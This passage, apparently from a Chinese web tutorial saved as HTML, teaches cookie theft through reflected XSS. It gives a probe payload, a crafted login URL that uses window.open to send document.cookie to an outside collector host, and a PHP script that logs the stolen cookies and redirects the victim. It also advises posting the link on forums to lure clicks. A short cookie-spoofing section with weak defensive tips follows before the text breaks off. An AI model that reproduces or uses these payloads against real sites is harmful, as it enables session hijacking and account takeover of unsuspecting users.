<p class=ContentFont style="PADDING-RIGHT: 10px; DISPLAY: block; PADDING-LEFT: 10px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px"> 首先打开我们要收集Cookie的网站,这里假设是http://www.XXX.net,登陆网站输入用户名“<a1>”(不含引号),对数据进行分析抓包,得到形如“http://www.XXX.net/txl/login/login.pl?username=<a1>&passwd=&ok.x=28&ok.y=6”的代码,将“<a1>”更换为“ <script>alert(document.cookie)</script> ”再试;如果执行成功,就开始构造URL:“http://www.XXX.net/txl/login/login.pl?username= <script>window.open("http://www.cbifamily.org/cbi.php?"%2Bdocument.cookie)</script> &passwd=&ok.x=28&ok.y=6”。其中http:///www.cbifamily.org/cbi.php就是你能够控制的某台主机上的一个脚本。需要注意的是“%2B”为符号“+”的URL编码,因为“+”将被作为空格处理。该URL就可以在<a class=Channel_KeyLink href="http://bbs.77169.com/">论坛</a>中发布,诱使别人点击了。</p> <p class=ContentFont style="PADDING-RIGHT: 10px; DISPLAY: block; PADDING-LEFT: 10px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px"> 2.编制PHP脚本</p> <p class=ContentFont style="PADDING-RIGHT: 10px; DISPLAY: block; PADDING-LEFT: 10px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px"> 该脚本的作用就是收集Cookie文件,具体内容如下:</p> <p class=ContentFont style="PADDING-RIGHT: 10px; DISPLAY: block; PADDING-LEFT: 10px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px"> <?php<br> $info = getenv("QUERY_STRING");<br> if ($info) {<br> $fp = fopen("info.txt","a");<br> fwrite($fp,$info."\n");<br> fclose($fp);<br> }<br> header("Location: http://www.XXX.net");<br> ?></p> <p class=ContentFont style="PADDING-RIGHT: 10px; DISPLAY: block; PADDING-LEFT: 10px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px"><br> 四、Cookie的安全问题 适用对象:所有希望上网安全的读者</p> <p class=ContentFont style="PADDING-RIGHT: 10px; DISPLAY: block; PADDING-LEFT: 10px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px"> 1.Cookie欺骗</p> <p class=ContentFont style="PADDING-RIGHT: 10px; DISPLAY: block; PADDING-LEFT: 10px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px"> Cookie记录着用户的帐户ID、密码之类的信息,如果在网上传递,通常使用的是MD5方法加密。这样经过加密处理后的信息,即使被网络上一些别有用心的人截获,也看不懂,因为他看到的只是一些无意义的字母和数字。然而,现在遇到的问题是,截获Cookie的人不需要知道这些字符串的含义,他们只要把别人的Cookie向服务器提交,并且能够通过验证,他们就可以冒充受害人的身份,登陆网站。这种方法叫做Cookie欺骗。Cookie欺骗实现的前提条件是服务器的验证程序存在漏洞,并且冒充者要获得被冒充的人的Cookie信息。目前网站的验证程序要排除所有非法登录是非常困难的,例如,编写验证程序使用的语言可能存在漏洞。而且要获得别人Cookie是很容易的,用支持Cookie的语言编写一小段代码就可以实现(具体方法见三),只要把这段代码放到网络里,那么所有人的Cookie都能够被收集。如果一个<a class=Channel_KeyLink href="http://bbs.77169.com/">论坛</a>允许HTML代码或者允许使用Flash标签就可以利用这些技术收集Cookie的代码放到<a class=Channel_KeyLink href="http://bbs.77169.com/">论坛</a>里,然后给帖子取一个吸引人的主题,写上有趣的内容,很快就可以收集到大量的Cookie。在<a class=Channel_KeyLink href="http://bbs.77169.com/">论坛</a>上,有许多人的密码就被这种方法盗去的。至于如何防范,目前还没有特效药,我们也只能使用通常的防护方法,不要在<a class=Channel_KeyLink href="http://bbs.77169.com/">论坛</a>里使用重要的密码,也不要使用IE自动保存密码的功能,以及尽量不登陆不了解底细的网站。</p> <p class=ContentFont style="PADDING-RIGHT: 10px; DISPLAY: block; PADDING-LEFT: 10px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px"> 2.Flash的代码隐患</p> <p class=ContentFont style="PADDING
联系客服